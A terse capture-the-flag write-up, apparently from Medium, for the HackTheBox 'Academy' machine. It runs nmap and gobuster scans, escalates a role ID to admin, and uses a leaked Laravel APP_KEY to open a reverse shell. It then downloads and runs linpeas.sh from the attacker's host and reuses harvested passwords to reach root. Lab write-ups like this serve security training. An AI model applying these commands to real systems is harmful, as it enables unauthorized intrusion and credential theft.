Academy — HackTheBox — WriteUp

nmap -A -T4 -p- -v <ip>

nmap
website

gobuster dir -u http://academy.htb -w /path-to-wordlist

gobuster
/admin
burp

non-admin: roleid=0

admin: roleid=1

admin-page
dev page
sensitive information

search laravel

search laravel

APP_KEY: paste the app key in the dev page above

RHOSTS: the machine’s ip

RPORT: The website’s port

LHOST: Your VPN-ip

LPORT: your listener port

VHOST: the subdomain name

reverse_shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

tty shell
home
mysql

python3 -m http.server 9000

wget http://<your-VPN-ip>:9000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

result.txt
mysql credential
root’s mysql
users’ password
decrypt
su cry0l1t3
user.txt
sudo -l
adm group
mrb3n password
su mrb3n
gtfo
root shell
root.txt
message

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store